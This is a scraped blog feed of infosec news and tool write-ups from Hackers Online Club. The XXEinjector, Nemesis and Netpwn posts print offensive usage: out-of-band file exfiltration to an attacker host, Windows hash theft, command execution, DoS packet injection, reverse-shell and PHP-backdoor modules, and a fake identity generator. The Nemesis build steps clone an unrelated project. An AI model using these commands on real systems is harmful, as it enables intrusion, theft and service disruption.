Quantcast
Channel: Hackers Online Club (HOC)
Viewing all 855 articles
Browse latest View live

The Supreme Court of INDIA Website Gets Hacked

$
0
0


The Supreme Court of INDIA Website Gets Hacked


Supreme Court of India website got hacked, claimed by Brazil HackTeam. 




According to SC website posted screenshot, "hackedo por HighTech Brazil HackTeam."

Now the website is under maintenance, and site information was offline.


In few days back India's Defense Ministry website was hacked, after which the Home and Law Ministry websites were also down. Reports had claimed that website was hacked by chinese cyber criminals as it showed character translate into 'Zen' word.

Earlier this year, 700 websites of central and state government of India were hacked in last 4 years according to Government.

All countries government must be serious about cyber crime activities. Also to hire Ethical Hackers and Cyber security experts globally to secure the government websites.

Lack of cyber security is the main reason to website become vulnerable to hack. If the Government launch Bug bounty program then its also good opportunity to secure these websites.  

Tinfoleak - The Most Complete Open-Source Tool For Twitter Intelligence Analysis

$
0
0
Tinfoleak - The Most Complete Open-Source Tool For Twitter Intelligence Analysis

Tinfoleak - The Most Complete Open-Source Tool For Twitter Intelligence Analysis


Tinfoleak is an open-source tool within the OSINT (Open Source Intelligence) and SOCMINT (Social Media Intelligence) disciplines, that automates the extraction of information on Twitter and facilitates subsequent analysis for the generation of intelligence.

Taking a user identifier, geographic coordinates or keywords, tinfoleak analyzes the Twitter timeline to extract great volumes of data and show useful and structured information to the intelligence analyst.

Tinfoleak is included in several Linux Distros: Kali, CAINE, BlackArch and Buscador. It is currently the most comprehensive open-source tool for intelligence analysis on Twitter.

Tinfoleak can extract the following information:


  • Account info / User Activity / Protected Accounts
  • Source Applications / User Devices / Use Frequency
  • Hashtags / Mentions / Likes
  • Text Analysis / Words Frequency / Media / Metadata
  • User Visited Places / User Routes / User Top Locations
  • Social Networks / Digital Identities
  • Geolocated Users / Tagged Users
  • Followers / Friends
  • Lists / Collections
  • Conversations

Installation

Install Python and dependencies:

sudo apt install python-pip python-dev build-essential python2.7-dev python-pyexiv2 python-openssl
sudo pip install --upgrade pip 
sudo pip install --upgrade virtualenv 
sudo pip install --upgrade tweepy
sudo pip install --upgrade pillow
sudo pip install --upgrade exifread
sudo pip install --upgrade jinja2 
sudo pip install --upgrade oauth2

Getting started

The first time you runs tinfoleak, you need to assign the OAuth settings.

1. Edit "tinfoleak.conf" 
Use your favorite editor ;-)

2. Give value to these variables: 
CONSUMER_KEY 
CONSUMER_SECRET 
ACCESS_TOKEN 
ACCESS_TOKEN_SECRET
>How to obtain these values: 
https://developer.twitter.com/en/docs/basics/authentication/guides/access-tokens"

3. Save "tinfoleak.conf"
4. Execute "tinfoleak.py"

Download Tinfoleak V2.4 

Wireshark 2.6 Version Releases With New Features Include HTTP Request Sequences Support

$
0
0
Wireshark 2.6 Version Releases With New Features Include HTTP Request Sequences Support


Wireshark 2.6 Version Releases With New Features

Wireshark is the world’s most popular network protocol analyzer. It is used for troubleshooting, analysis, development and education.

In Wireshark 2.6 version include support for HTTP Request sequences, support for MaxMind DB files, Microsoft Network Monitor capture file support, as well as LoRaTap capture interface support. Also support for the GeoIP and GeoLite Legacy databases. The IP map feature was removed.

According to Wireshark Release note,

Wireshark 2.6 is the last release that will support the legacy (GTK+) user interface. It will not be supported or available in Wireshark 3.0.

Many user interface improvements have been made. See the “New and Updated Features” section below for more details.

New and Updated Features are follows:

The following features are new (or have been significantly updated) since version 2.5.0:


  • HTTP Request sequences are now supported.
  • Wireshark now supports MaxMind DB files. Support for GeoIP and GeoLite Legacy databases has been removed.
  • The Windows packages are now built using Microsoft Visual Studio 2017.
  • The IP map feature (the “Map” button in the “Endpoints” dialog) has been removed.

The following features are new (or have been significantly updated) since version 2.4.0:


  • Display filter buttons can now be edited, disabled, and removed via a context menu directly from the toolbar
  • Drag & Drop filter fields to the display filter toolbar or edit to create a button on the fly or apply the filter as a display filter.
  • Application startup time has been reduced.
  • Some keyboard shortcut mix-ups have been resolved by assigning new shortcuts to Edit → Copy methods.
  • TShark now supports color using the --color option.
  • The "matches" display filter operator is now case-insensitive.
  • Display expression (button) preferences have been converted to a UAT. This puts the display expressions in their own file. Wireshark still supports preference files that contain the old preferences, but new preference files will be written without the old fields.
  • SMI private enterprise numbers are now read from the “enterprises.tsv” configuration file.
  • The QUIC dissector has been renamed to Google QUIC (quic → gquic).
  • The selected packet number can now be shown in the Status Bar by enabling Preferences → Appearance → Layout → Show selected packet number.
  • File load time in the Status Bar is now disabled by default and can be enabled in Preferences → Appearance → Layout → Show file load time.
  • Support for the G.729A codec in the RTP Player is now added via the bcg729 library.
  • Support for hardware-timestamping of packets has been added.
  • Improved NetMon .cap support with comments, event tracing, network filter, network info types and some Message Analyzer exported types.
  • The personal plugins folder on Linux/Unix is now ~/.local/lib/wireshark/plugins.
  • TShark can print flow graphs using -z flow…
  • Capinfos now prints SHA256 hashes in addition to RIPEMD160 and SHA1. MD5 output has been removed.
  • The packet editor has been removed. (This was a GTK+ only experimental feature.)
  • Support BBC micro:bit Bluetooth profile
  • The Linux and UNIX installation step for Wireshark will now install headers required to build plugins. A pkg-config file is provided to help with this (see “doc/plugins.example” for details). Note you must still rebuild all plugins between minor releases (X.Y).
  • The Windows installers and packages now ship with Qt 5.9.4.
  • The generic data dissector can now uncompress zlib compressed data.
  • DNS Stats now supports service level statistics.
  • DNS filters for retransmissions and unsolicited responses have been added.
  • The “tcptrace” TCP Stream graph now shows duplicate ACKS and zero window advertisements.
  • The membership operator now supports ranges, allowing display filters such as tcp.port in {4430..4434} to be expressed. See the User’s Guide, chapter Building display filter expressions for details.


New Protocol Support as follows:

ActiveMQ Artemis Core Protocol, AMT (Automatic Multicast Tunneling), AVSP (Arista Vendor Specific Protocol), Bluetooth Mesh, Broadcom tags (Broadcom Ethernet switch management frames), CAN-ETH, CVS password server, Excentis DOCSIS31 XRA header, F1 Application Protocol, F5ethtrailer, FP Mux, GRPC (gRPC), IEEE 1905.1a, IEEE 802.11ax (High Efficiency WLAN (HEW)), IEEE 802.15.9 IEEE Recommended Practice for Transport of Key Management Protocol (KMP) Datagrams, IEEE 802.3br Frame Preemption Protocol, ISOBUS, LoRaTap, LoRaWAN, Lustre Filesystem, Lustre Network, Nano / RaiBlocks Cryptocurrency Protocol (UDP), Network Functional Application Platform Interface (NFAPI) Protocol, New Radio Radio Link Control protocol, New Radio Radio Resource Control protocol, NR (5G) MAC protocol, NXP 802.15.4 Sniffer Protocol, Object Security for Constrained RESTful Environments (OSCORE), PFCP (Packet Forwarding Control Protocol), Protobuf (Protocol Buffers), QUIC (IETF), RFC 4108 Using CMS to Protect Firmware Packages, Session Multiplex Protocol, SolarEdge monitoring protocol, Steam In-Home Streaming Discovery Protocol, Tibia, TWAMP and OWAMP, Wi-Fi Device Provisioning Protocol, and Wi-SUN FAN Protocol

Updated Protocol Support
Too many protocols have been updated to list here.

New and Updated Capture File Support
Microsoft Network Monitor

New and Updated Capture Interfaces support
LoRaTap

Vendor-supplied Packages

Most Linux and Unix vendors supply their own Wireshark packages. You can usually install or upgrade Wireshark using the package management system specific to that platform. A list of third-party packages can be found on the download page on the Wireshark web site.

File Locations

Wireshark and TShark look in several different locations for preference files, plugins, SNMP MIBS, and RADIUS dictionaries. These locations vary from platform to platform. You can use About→Folders to find the default locations on your system.

Bug Fixes here | Download Wireshark 2.6

Nemesis: A Command-line Network Packet Crafting And Injection Utility

$
0
0
A Command-line Network Packet Crafting And Injection Utility


A Command-line Network Packet Crafting And Injection Utility

The Nemesis Project is designed to be a command line based, portable human IP stack for UNIX-like and Windows systems. 


The suite is broken down by protocol, and should allow for useful scripting of injected packets from simple shell scripts.

Key Features


  • ARP/RARP, DNS, ETHERNET, ICMP, IGMP, IP, OSPF, RIP, TCP and UDP protocol support
  • Layer 2 or Layer 3 injection on UNIX-like systems
  • Layer 2 injection (only) on Windows systems
  • Packet payload from file
  • IP and TCP options from file
  • Tested on OpenBSD, Linux, Solaris, Mac OS X and Windows 2000

Each supported protocol uses its own protocol "injector" which is accompanied by a man page explaining its functionality.

Consult the ChangeLog for release details, and the documentation for each protocol injector for in-depth descriptions of the available functionality.

Examples


  • Inject malformed ICMP redirect

sudo nemesis icmp -S 10.10.10.3 -D 10.10.10.1 -G 10.10.10.3 -i 5

  • IGMP v2 join for group 239.186.39.5

sudo nemesis igmp -v -p 22 -S 192.168.1.20 -i 239.186.39.5 -D 239.186.39.5

  • IGMP v2 query, max resp. time 10 sec, with Router Alert IP option

 echo -ne '\x94\x04\x00\x00'>RA
sudo nemesis igmp -v -p 0x11 -c 100 -D 224.0.0.1 -O RA

or

echo -ne '\x94\x04\x00\x00' | sudo nemesis igmp -v -p 0x11 -c 100 -D 224.0.0.1 -O -

  • IGMP v3 query, with Router Alert IP option

  echo -ne '\x03\x64\x00\x00'> v3
  sudo nemesis igmp -p 0x11 -c 100 -i 0.0.0.0 -P v3 -D 224.0.0.1 -O RA

  • Random TCP packet

  sudo nemesis tcp

  • DoS and DDoS testing
  sudo nemesis tcp -v -S 192.168.1.1 -D 192.168.2.2 -fSA -y 22 -P foo
  sudo nemesis udp -v -S 10.11.12.13 -D 10.1.1.2 -x 11111 -y 53 -P bindpkt
  sudo nemesis icmp redirect -S 10.10.10.3 -D 10.10.10.1 -G 10.10.10.3 -qR
  sudo nemesis arp -v -d ne0 -H 0:1:2:3:4:5 -S 10.11.30.5 -D 10.10.15.1

Build & Install

Nemesis is built around libnet. Windows platform builds require libpcap as well. On Debian and Ubuntu derived GNU/Linux systems:

sudo apt install libnet1-dev

The GNU Configure & Build system use /usr/local as the default install prefix. Usually this is sufficient, the below example installs to /usr instead:

tar xf nemesis-1.5.tar.xz
cd nemesis-1.5/
./configure --prefix=/usr
make -j5
sudo make install-strip

Building from GIT

If you want to contribute, or simply want to try out the latest but still unreleased features, then you need to know a few things about the GNU Configure & Build system:


  • configure.ac and a per-directory Makefile.am are key files
  • configure and Makefile.in are generated from autogen.sh, they are not stored in GIT but automatically generated for the release tarballs
  • Makefile is generated by configure script

To build from GIT you first need to clone the repository and run the autogen.sh script. This requires automake and autoconf to be installed on your system.

git clone https://github.com/troglobit/inadyn.git
cd inadyn/
./autogen.sh
./configure && make

GIT sources are a moving target and are not recommended for production systems, unless you know what you are doing!

Download

WSSAT - Web Service Security Assessment Open Source Tool

$
0
0
WSSAT - Web Service Security Assessment Open Source Tool


WSSAT - Web Service Security Assessment Tool

WSSAT is an open source web service security scanning tool which provides a dynamic environment to add, update or delete vulnerabilities by just editing its configuration files. 


This tool accepts WSDL address list as input file and for each service, it performs both static and dynamic tests against the security vulnerabilities. It also makes information disclosure controls. With this tool, all web services could be analysed at once and the overall security assessment could be seen by the organization.

Objectives of WSSAT are to allow organizations:

  • Perform their web services security analysis at once
  • See overall security assessment with reports
  • Harden their web services

WSSAT 2.0

REST API scanning support was added with same dynamic vulnerability management environment philosophy as SOAP services. ChangeLog

WSSAT’s main capabilities include:

Dynamic Testing:

  • Insecure Communication - SSL Not Used
  • Unauthenticated Service Method
  • Error Based SQL Injection
  • Cross Site Scripting
  • XML Bomb
  • External Entity Attack - XXE
  • XPATH Injection
  • HTTP OPTIONS Method
  • Cross Site Tracing (XST)
  • Missing X-XSS-Protection Header
  • Verbose SOAP Fault Message

Static Analysis:

  • Weak XML Schema: Unbounded Occurrences
  • Weak XML Schema: Undefined Namespace
  • Weak WS-SecurityPolicy: Insecure Transport
  • Weak WS-SecurityPolicy: Insufficient Supporting Token Protection
  • Weak WS-SecurityPolicy: Tokens Not Protected

Information Leakage:

Server or technology information disclosure

WSSAT’s main modules are:

  • Parser
  • Vulnerabilities Loader
  • Analyzer/Attacker
  • Logger
  • Report Generator

Installation and Usage:

Installation
Usage

Download

How To Delete Your Search Activities From Google?

$
0
0
How To Delete Your Search Activities From Google?


How to Delete Your Search Activities From Google?


When you use Google services, it keeps your data with your Google account to make its services work better for you. Today, we are telling you the way to secure your online search activities and how to take the protective measures. It includes:
  • Things you search for
  • Websites you visit
  • Videos you watch
  • Ads you click on or tap
  • Your location
  • Device information
  • IP address and cookie data

If you are signed in with your Google Account, it stores and protects whatever you do using Google services. It can include:
  • Emails you send and receive on Gmail
  • Contacts you add
  • Calendar events
  • Photos and videos you upload
  • Docs, Sheets, and Slides on Drive

How To Delete Your Search Activities From Google?

Follow these steps:

1. Sign into your Google account.
2. Go to Google Myactivity link
3. Click on "Delete activity by"



Once you clicked, you will be redirected to this page:



Below "Delete by date," select the Down arrow and then choose All time.
Select "Delete."


It will delete your activity from Google account.

You can also Delete individual activity items

For example, this could include a search you did on Google or a website you visited on Chrome:

  • On your computer, go to My Activity.
  • Find the item you want to delete. You can find an item in a few different ways, including:
  • Browse by day. At the top right of the page, choose More More and then Item view
  • Search or use filters.
  • On the item you want to delete, choose More More and then Delete.
Google mostly use your search activities for their Advertisements.

How Google Ad Works?

Whenever you search for any keyword on Google then it shows the relevant product on any website you visit through Google Adsense.

For Instance: If you are searching for "CyberSecurity" Keyword then cookies will save this keyword across your browser and your google account.

So whenever you visit any website where Google Adsense is placed, then it will show "CyberSecurity" related Ads to you.

Google explains why they collect your data to use. But one thing Google claims that they are not selling any personal data to the third parties.

Data privacy is very important to users. As we all aware about Facebook Cambridge analytica Scandal.

To delete your web cookies or history is also way to protect. But by deleting your all web browsing history doesn't much protect your online transparency though.

Delete Your Google Browser History:

  • Sign into your Google account first on your computer, open the Google Chrome.
  • At the top right, click More.
  • Click "History".
  • On the left, click "Clear browsing data". A box will appear.
  • From the drop-down menu, select how much history you want to delete. To clear everything, select "the beginning of time".
  • Check the boxes for the info you want Google Chrome to clear, including “browsing history.” 
  • Click Clear "browsing data".

HackersOnlineClub (HOC) is Celebrating 7th Anniversary Today

$
0
0
HackersOnlineClub (HOC) is Celebrating 7th Anniversary Today


HackersOnlineClub (HOC) is Celebrating 7th Anniversary Today!


7 years ago on the same date, We have started this site to share our knowledge on the dedicated platform to deliver latest Ethical Hacking Techniques; Cyber Security Updates, Latest Infosec News and Updates for Beginners, Security Researchers and Bug Hunters.

A big thank to everyone who have helped us throughout this journey. We would always be in debt for your love & encouragement that has brought us to this stage of accomplishment & will take us further & this hope will continue in coming years as well.

A Heartful Congratulations to everybody out there.

We would like to celebrate this success by honoring all our readers and friends who have helped us make this deed possible. Today, this platform has become gigantic and reaches to every Infosec people including security researchers, bug hunters, students as well.

What's New?

HOC team is working on a new security portal which will be launched soon in the coming month. We are thankful to all our readers, security researchers and experts who always support us.

Our Total Social Media Stats are 2.5 Million and total website reach is around 15 Million.

Our Portals:

Website | Blog | SEO Portal

Stay Tuned with Us on Social Media Platform

Facebook | Twitter  | Instagram | Telegram | YouTube

Russia Blocks VPN Services For Telegram Messenger Access

$
0
0
Russia Blocks VPN Services For Telegram Messenger Access


Russia Blocks VPN Services For Telegram Messenger Access


  • Russia blocks Telegram Messenger Last month
  • Russia also blocked 20 Million Google and Amazon IP address 
  • The Number of percentage Russian user signup increases for VPN services.



Roskomnadzor, Russian Telecommunication Regulator has blocked around 50 VPN services that provide access to the Telegram Messenger.

In Last month, Russia Bans Telegram Messenger Over Encryption Dispute

In Moscow, the district court has ordered to be blocked Telegram Messenger, after the company repeatedly refused to hand over encryption keys to its messages to Russia's Federal Security Service.

According to meduza,
Since 16 April 2018, Russia has blocked 20 million IP address, including servers operated by Google, Amazon, Microsoft and Digital Ocean that operated Telegram in the country. Roskomnadzor didn't specify that which services actively get blocking.

After that, some users are having a problem to access Google services like Gmail and Android apps and to access Internet Banking services.

As Google confirmed last month in the statement, "We are aware of reports that some users in Russia are unable to access some Google Products and are investigating those reports."

Roskomnadzor said that despite a court order Google has not complied with a request to prevent Telegram from using its IP address in to continue operating.

There are 15 million users of Telegram in Russia. You can Use Top Secure VPN For Online Privacy

XXEinjector: A Ruby Based Tool For Automatic Exploitation of XXE Vulnerability

$
0
0
XXEinjector: A Ruby Based Tool For Automatic Exploitation of XXE Vulnerability


XXEinjector: Tool for automatic exploitation of XXE vulnerability using direct and different out of band methods.


XXEinjector automates retrieving files using direct and out of band methods. Directory listing only works in Java applications. Bruteforcing method needs to be used for other applications.

Options:

  --host Mandatory - our IP address for reverse connections. (--host=192.168.0.2)

  --file Mandatory - file containing valid HTTP request with xml. You can also mark with "XXEINJECT" a point where DTD should be injected. (--file=/tmp/req.txt)

  --path Mandatory if enumerating directories - Path to enumerate. (--path=/etc)

  --brute Mandatory if bruteforcing files - File with paths to bruteforce. (--brute=/tmp/brute.txt)

  --logger Log results only. Do not send requests. HTTP logger looks for "p" parameter with results.
  
  --rhost Remote host's IP address or domain name. Use this argument only for requests without Host header. (--rhost=192.168.0.3)

  --rport Remote host's TCP port. Use this argument only for requests without Host header and for non-default values. (--rport=8080)

  --oob Out of Band exploitation method. FTP is default. FTP can be used in any application. HTTP can be used for bruteforcing and enumeration through directory listing in Java < 1.7 applications. Gopher can only be used in Java < 1.7 applications. (--oob=http/ftp/gopher)

  --direct Use direct exploitation instead of out of band. Unique mark should be specified as a value for this argument. This mark specifies where results of XXE start and end. Specify --xml to see how XML in request file should look like. (--direct=UNIQUEMARK)

  --cdata Improve direct exploitation with CDATA. Data is retrieved directly, however OOB is used to construct CDATA payload. Specify --cdata-xml to see how request should look like in this technique.

  --2ndfileFile containing valid HTTP request used in second order exploitation. (--2ndfile=/tmp/2ndreq.txt)

  --phpfilterUse PHP filter to base64 encode target file before sending.

  --netdoc      Use netdoc protocol instead of file (Java).

  --enumportsEnumerating unfiltered ports for reverse connection. Specify value "all" to enumerate all TCP ports. (--enumports=21,22,80,443,445)

  --hashes    Steals Windows hash of the user that runs an application.

  --expect    Uses PHP expect extension to execute arbitrary system command. Best works with HTTP and PHP filter. (--expect=ls)

  --upload    Uploads specified file using Java jar schema into temp file. (--upload=/tmp/upload.txt)

  --xsltTests for XSLT injection.

  --sslUse SSL.

  --proxyProxy to use. (--proxy=127.0.0.1:8080)

  --httpportSet custom HTTP port. (--httpport=80)

  --ftpportSet custom FTP port. (--ftpport=21)

  --gopherportSet custom gopher port. (--gopherport=70)

  --jarportSet custom port for uploading files using jar. (--jarport=1337)

  --xsltportSet custom port for XSLT injection test. (--xsltport=1337)

  --test   This mode shows request with injected payload and quits. Used to verify correctness of request without sending it to a server.

  --urlencode  URL encode injected DTD. This is default for URI.

  --nodtd    If you want to put DTD in request by yourself. Specify "--dtd" to show how DTD should look like.

  --output  Output file for bruteforcing and logger mode. By default it logs to brute.log in current directory. (--output=/tmp/out.txt)

  --timeout  Timeout for receiving file/directory content. (--timeout=20)

  --contimeoutTimeout for closing connection with server. This is used to prevent DoS condition. (--contimeout=20)

  --fast   Skip asking what to enumerate. Prone to false-positives.

  --verbose  Show verbose messages.

Example usage:

  Enumerating /etc directory in HTTPS application:
  ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl

  Enumerating /etc directory using gopher for OOB method:
  ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher

  Second order exploitation:
  ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt

  Bruteforcing files using HTTP out of band method and netdoc protocol:
  ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc

  Enumerating using direct exploitation:
  ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK

  Enumerating unfiltered ports:
  ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all

  Stealing Windows hashes:
  ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes

  Uploading files using Java jar:
  ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf

  Executing system commands using PHP expect:
  ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls

  Testing for XSLT injection:
  ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt
  
Log requests only:
  ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt

Download

American TV Star Paris Hilton Bank Accounts and Personal Information Has Been Hacked

$
0
0
Hollywood TV Star Paris Hilton Bank Accounts and Personal Information Has Been Hacked


American TV Star Paris Hilton Bank Accounts and Personal Information Has Been Hacked


For the past couple years, Paris Hilton was the victim of hacking. She was the victim by Female Hacker between 2015-2017.

According to TMZ, Hacker woman named "Paytsar Bkhchadzhyan", who hacked Paris Hilton bank accounts, credit cards and more private information.

The Female hacker breaches accounts of Paris Hilton's father and sister. She used her credit card for booked New Year Eve party at Hotel in 2015. Its more than $40,000 were spent on that night, according to report.

It is unknown what Payster intention to hack her private information and its not clear that how much female hacker stole the money.


Also, female hacker stole her private photos from Hilton iCloud account. She was arrested in 2017 and guilty to Bank fraud conspiracy. Now she will be 57 months in prison and pay restitution to the Paris Hilton and other victims around $318,535 USD, according to report.

Many of female celebrities were also targeted through Fappening including Miley Cyrus, Kate Hudson, and Suki Waterhouse, Emma Watson and more.

Android P Restricts Network Activity Monitoring Apps

$
0
0
Android P Restricts Network Activity Monitoring Apps


Android P Restricts Network Activity Monitoring Apps

Whenever we download Apps from Play Store, we give full access to the apps and they can monitor your full network activity.


They can sniff your incoming and outgoing connection via TCP/UDP to determine if you are connecting to a server. Collective information of user data can be then sell to Advertisers.

xda-developers explains,
A new commit has appeared in the Android Open Source Project to “start the process of locking down proc/net.” /proc/net contains a bunch of output from the kernel related to network activity. There’s currently no restriction on apps accessing /proc/net, which means they can read from here (especially the TCP and UDP files) to parse your device’s network activity. You can install a terminal app on your phone and enter cat /proc/net/udpto see for yourself.

According to Google sources,
Files in /proc/net leak information. This change is the first step in determining which files apps may use, whitelisting benign access, and otherwise removing access while providing safe alternative APIs.

To that end, this change:

  • Introduces the proc_net_type attribute which will assigned to any new SELinux types in /proc/net to avoid removing access to privileged processes. These processes may be evaluated later, but are lower priority than apps.
  • Labels /proc/net/{tcp,tcp6,udp,udp6} as proc_net_vpn due to existing use by VPN apps. This may be replaced by an alternative API.
  • Audits all other proc/net access for apps.
  • Audits proc/net access for other processes which are currently granted broad read access to /proc/net but should not be including storaged, zygote, clatd, logd, preopt2cachename and vold.

The  Android Security researchers said, that new changes coming to Android SELinux, access to some of this information will be restricted. In particular, the change applies to the SELinux rules of Android P and it means that only some VPN apps will be allowed access to some of these files. 

As we have already seen many Apps do Malvertising. Google has always been working on improving Android Security to keep your phone secure.

Adobe Patches Number of Security Vulnerabilities for Creative Cloud, Flash Player and Connect

$
0
0
Adobe Security Vulnerability Patch


Adobe Patches Number of Security Vulnerabilities for Creative Cloud, Flash Player and Connect


Adobe has published security bulletins for Adobe Creative Cloud Desktop Application (APSB18-12), Adobe Flash Player (APSB18-16),  and Adobe Connect (APSB18-18).  


Adobe Creative Cloud Desktop Application

Adobe has released a security update for the Creative Cloud Desktop Application for Windows and MacOS. This update resolves a vulnerability in the validation of certificates used by Creative Cloud desktop applications (CVE-2018-4991), and an improper input validation vulnerability (CVE-2018-4992) that could lead to privilege escalation. Affected 4.4.1.298 and earlier versions on Windows and MacOS platform.

Adobe has resolved following vulnerabilities for Creative Clod packager

  1. Improper input validation
  2. Improper certificate validation
  3. Unquoted Search Path 


To check the version of the Adobe Creative Cloud desktop app:

  • Launch the Creative Cloud desktop app and sign in with your Adobe ID.
  • Click the gear icon and choose Preferences > General.

Adobe Flash Player:

Adobe has released security updates for Adobe Flash Player for Windows, Macintosh, Linux and Chrome OS. These updates address critical vulnerabilities in Adobe Flash Player 29.0.0.140 and earlier versions. Successful exploitation could lead to arbitrary code execution in the context of the current user.

Affected 29.0.0.140 and earlier versions on Windows, Macintosh and Linux platform.

Adobe Connect:

An important authentication bypass vulnerability (CVE-2018-4994) exists in Adobe Connect versions 9.7.5 and earlier. Successful exploitation of this vulnerability could result in sensitive information disclosure.

Affected 9.7.5 and earlier version on all platforms.

Adobe recommends users update their product installations to the latest versions using the instructions referenced in the relevant bulletin.

Last month in April, Adobe was fixed around 19 vulnerabilities in their products.

New Malware Designs To Grab Data From Google Chrome And Firefox Browser

$
0
0
New Malware Designs to Grab Data From Google Chrome And Firefox Browser


New Malware Designs To Grab Data From Google Chrome And Firefox Browser


The malware is written in .Net and it is a variant of August Stealer. Which locates and steals credentials of sensitive documents and other wallet details from an infected system. 


But this new Malware "Vega Stealer" is quite different including a new network communication protocol and functionality with browser stealing activity.

The security researchers from Proofpoint says that,
"The malware contains stealing functionality targeting saved credentials and credit cards in the Chrome and Firefox browsers, as well as stealing sensitive documents from infected computers."

How does Vega Stealer work?

Vega stealer attached with any documents via Email or direct for containing activities. The Malware designs as longer lasting impacts if further developed and distributed. Due to the distribution and lineage, this threat may continue to evolve and grow to be a commonly observed threat. The name 'Vega Stealer' was derived from a pdb string used within the binary

C:\Users\Willy\source\repos\Vega\Vega\obj\Release\Vega.pdb

Vega Stealer is written in .NET and the sample we observed dropping in the wild did not contain any packing or obfuscation methods. One of the goals of Vega appears to be gathering and exfiltrating saved data from the Google Chrome browser, including:

  • Passwords (the “logins” SQLite table contains URLs and username and password pairs)
  • Saved credit cards (the “credit_cards” autofill table contains a name, expiration date, and card number)
  • Profiles (the “autofill_profile_names” table contains first, middle, and last name)
  • Cookies


For Mozilla browser, Vega collects the files from “\\Mozilla\\Firefox\\Profiles” folder, namely “key3.db"“key4.db", “logins.json", and “cookies.sqlite". These files store password and Keys.

Vega also could take a screenshot of victim machine. Vega stealer communicates with C&C server using the HTTP protocol. There are two parameters used in the C&C traffic, specifically in the client body of the request. 'f=' is the filename and 'c=' is the base64-encoded data portion of the request. The order of network communication with the C&C is a follows:

  • If found, send the “key3.db"“key4.db", “logins.json", and “cookies.sqlite" Mozilla Firefox files
  • Send the screenshot file “screenshot.png” (Desktop screenshot)
  • Send the “chrome_pw.txt” containing saved data stolen from Chrome; the “c=” parameter will be empty if none is found
  • Further network requests exist if Vega finds any documents matching the “doc|docx|txt|rtf|xls|xlsx|pdf” extensions.

How is it more dangerous?

Proofpoint researchers say that, we believe is for sale and used by multiple actors, including the threat actor spreading Emotet banking Trojan. However, the URL patterns from which the macro retrieves the payload are the same as those used by an actor we are tracking who distributes the Ursnif banking Trojan, which often downloads secondary payloads such as Nymaim, Gootkit, or IcedID. As a result, we attribute this campaign to the same actor with medium confidence.

How can we protect?

Hackersonlineclub (HOC) team is always keeping you aware of the Malware activities.

  • Do not open any unknown attachment.
  • Always use Internet Security 
  • Keep your system update
  • Do not save your password in your browser.
  • Change your password time by time.

Netpwn - A Framework For Automate Pentesting Tasks

$
0
0

Netpwn - A Framework For Automate Pentesting Tasks. 

Netpwn is written in python 2.7 software language.


Modules 

reverse_shell - Creates a reverse shell with python to connect to a specific machine of your choice.
send_file - Allows you to send a file to target server.
php_backdoor - Generates a simple backdoor in php upload to web server ?cmd= to execute commands.
hash_check - Paste a hash to see what type of hash it is.
base64_converter - Paste base64 to decode or ascii to encode it knows which you want.
address_info - Gives you your ipv4, ipv6, and public Ip address based upon a interface.
generate_shellcode - Gives you some basic shell code for example execute /bin/sh.
hex_converter - Paste some ascii to encode or hex to decode it knows which you want.
page_contents - Get the raw HTML of a given web page.
password_checker - Check the strength of a given password.
fake_identity - Creates a fake name with SSN, address, credit card number, etc.
web_spider - Crawls a given URL for links.
ssl_cert - Gets the cert information of a given web site and its public key.
bash - Execute bash commands without exiting out of netpwn.
whois - Performs whois on a given URL.


Resources 

cheat_sheet - Pentest monkey reverse shell cheat sheet
useful_links - Links to blogs, youtube channels, and other resources that offer good information about various topics that gives you the opportunity to learn more about the infosec field.

Usage 

To run a specific module just type module name.
For example to run php_backdoor the command should look like this.
(netpwn) > php_backdoor

Features 

AutoComplete - Type a few letters of the command you want and hit tab to for auto completion.
clear - Type this to clear the screen.
banner - Type this command to display the banner.
help - Type this command to display help menu.
modules - Type this command to list available modules.
resources - Type this command to list available resources.
exit or CTRL^C - Exits netpwn

Install

#git clone https://github.com/3XPL017/netpwn.git; cd netpwn; chmod +x install; ./install

Download Netpwn

Microsoft Released Security Updates for Windows 10

$
0
0


Microsoft Released Security Updates for Windows 10


The security updates includes, VPN, Bitlocker, Windows Authentication Manager, Virtual Machine, Microsoft Edgerbrowser and more.


This update includes quality improvements. No new operating system features are being introduced in this update. Key changes include:


  • Addresses additional issues with updated time zone information. 
  • Addresses an issue that causes Internet Explorer dialogs on a second monitor to also appear on the primary monitor when using extended display. 
  • Addresses an issue with Microsoft Edge browser windows in remote sessions. 
  • Addresses a reliability issue in .NET applications when using a Japanese IME in a textbox. 
  • Addresses a reliability issue that may cause Microsoft Edge or other applications to stop responding when you create a new audio endpoint while audio or video playback is starting. 
  • Addresses an issue with Bluetooth devices failing to receive data after a restart. 
  • Addresses an issue that can prevent the touch keyboard from showing up reliably in some instances. 
  • Addresses an issue where UWP apps that store local crash dumps in their local app data folders can't be cleared using Disk Cleanup or StorageSense. In these cases, LocalDumps isn't enabled. 
  • Addresses an issue that prevents adding performance counters to the Performance Monitor on systems with many processors. 
  • Addresses an issue that causes BitLocker to go into recovery mode when updates are applied. 
  • Addresses an issue where expired VPN certificates aren't deleted, slowing application performance. 
  • Addresses an issue that causes sporadic authentication issues when using Windows Authentication Manager. 
  • Addresses an issue that causes client applications that use Windows Authentication Manager to stop working when making a request to the server. 
  • Addresses an issue with the invalidation of the Windows Authentication Manager token cache. 
  • Addresses an issue that cause a timeout error when a VPN tries to disconnect from a device that is in the Connected Standby state. 
  • Provides an explicit error when plugins fail to connect to prevent timeouts. 
  • Addresses an issue where running the DiskShadow utility after adding a persistent memory controller causes RetrieveAllVirtualMachinesComponentsMetadata() to stop responding. 
